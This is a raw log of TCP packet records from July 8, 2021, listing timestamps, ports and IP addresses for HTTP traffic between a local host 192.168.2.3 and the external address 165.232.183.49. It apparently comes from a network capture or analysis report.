Jul 8, 2021 15:47:33.010113001 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.010144949 CEST	49757	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.010152102 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.010227919 CEST	49757	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.027308941 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.027852058 CEST	49757	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.051738024 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.053714991 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.053765059 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.053802013 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.053833008 CEST	49757	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.053868055 CEST	49757	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.053901911 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.053961992 CEST	49757	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.080791950 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.080884933 CEST	49757	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.181466103 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.181495905 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.181513071 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.181528091 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.181545019 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.181701899 CEST	49757	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.181751013 CEST	49757	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.183299065 CEST	49757	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.259176970 CEST	49756	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.342134953 CEST	80	49757	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.462551117 CEST	80	49756	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.771099091 CEST	80	49756	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.771603107 CEST	49756	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.772905111 CEST	49756	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.792424917 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.792463064 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.792484999 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.792505026 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.792521000 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.792538881 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.792953968 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.793853045 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.793899059 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.793919086 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.793939114 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.793978930 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.794027090 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.933439016 CEST	80	49756	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.951354980 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.951433897 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.974455118 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.974486113 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.974499941 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.974517107 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.974570036 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.974615097 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.974651098 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.974670887 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.974689960 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.974709034 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.974715948 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.974726915 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.974744081 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.974755049 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.974790096 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.974850893 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.975258112 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.975313902 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.975332022 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.975339890 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.975349903 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.975388050 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.975419998 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.975441933 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.975517988 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:33.975521088 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:33.975655079 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.108696938 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.108777046 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.156646013 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156673908 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156687021 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156703949 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156718016 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156734943 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156748056 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156748056 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.156760931 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156771898 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.156775951 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156795025 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156800032 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.156809092 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156821966 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156829119 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.156852007 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.156873941 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.156909943 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.156965017 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.156974077 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.157010078 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.157018900 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.157028913 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.157051086 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.157072067 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.157099009 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.157144070 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.265816927 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.266006947 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.337327957 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.337393045 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.337419987 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.337419987 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.337443113 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.337444067 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.337466955 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.337488890 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.337513924 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.337538004 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.337559938 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.337583065 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.337656021 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.337665081 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.337667942 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.338651896 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.338747978 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.338835955 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.338875055 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.338901043 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.338901997 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.338927984 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.338989019 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.339034081 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.339050055 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.339061975 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.339066029 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.339068890 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.339077950 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.339095116 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.339140892 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.339149952 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.339193106 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.424803019 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.425028086 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.519248962 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.519283056 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.519308090 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.519342899 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.519385099 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.519454002 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.519479990 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.519506931 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.519512892 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.519537926 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.519551039 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.519565105 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.519568920 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.519587040 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.519623995 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.520653009 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.520710945 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.520720005 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.520739079 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.520765066 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.520770073 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.520782948 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.520790100 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.520818949 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.520834923 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.520837069 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.520884991 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.520899057 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.520926952 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.520952940 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.520956039 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.520976067 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.521002054 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.521064997 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.521121025 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.582815886 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.582946062 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.700615883 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.700746059 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.700839043 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.700901985 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.700962067 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.700969934 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701006889 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701066017 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.701075077 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701085091 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.701138020 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701143980 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.701203108 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701221943 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.701235056 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701312065 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.701334000 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.701721907 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701781034 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701833963 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701884031 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701909065 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.701946020 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.701972961 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.701994896 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.702040911 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.702003956 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.702090025 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.702096939 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.702132940 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.702132940 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.702138901 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.702143908 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.702233076 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.742037058 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.742156029 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.745981932 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.746113062 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.860387087 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.860569954 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.882411003 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.882570028 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.882596970 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.882626057 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.882651091 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.882672071 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.882719040 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.882817984 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.882843971 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.882864952 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.882868052 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.882891893 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.882891893 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.882932901 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.882977009 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.882987976 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.883254051 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883285046 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883311033 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883348942 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.883364916 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.883500099 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883652925 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.883662939 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883697987 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883749962 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.883779049 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.883826971 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883868933 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883907080 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.883909941 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883943081 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883968115 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.883981943 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.883995056 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.883999109 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.884031057 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.902149916 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.902230024 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:34.971287966 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:34.971416950 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.020198107 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.020313025 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.063971996 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.064001083 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.064018965 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.064034939 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.064050913 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.064066887 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.064081907 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.064085960 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.064135075 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.064202070 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.064238071 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.065090895 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065136909 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.065160990 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065180063 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065196991 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065198898 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.065213919 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.065252066 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.065366030 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065383911 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065409899 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.065419912 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065432072 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.065438032 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065454006 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065459967 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.065469980 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065484047 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.065485001 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.065510035 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.065546036 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.129281998 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.129354000 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.193670034 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.193737984 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.193824053 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.193856001 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.222532034 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.222708941 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.245651007 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.245680094 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.245696068 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.245714903 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.245732069 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.245747089 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.245765924 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.245836020 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.245870113 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.246536016 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.246711969 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.246725082 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.246803999 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.246818066 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.246865988 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.246922016 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.246934891 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.246948957 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.246995926 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.247015953 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.247045994 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.247049093 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.247081041 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.247109890 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.247138023 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.247150898 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.247162104 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.247164011 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.247195005 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.247225046 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.247253895 CEST	80	49759	165.232.183.49	192.168.2.3
Jul 8, 2021 15:47:35.247258902 CEST	49759	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:47:35.247281075 CEST	49759	80	192.168.2.3	165.232.183.49
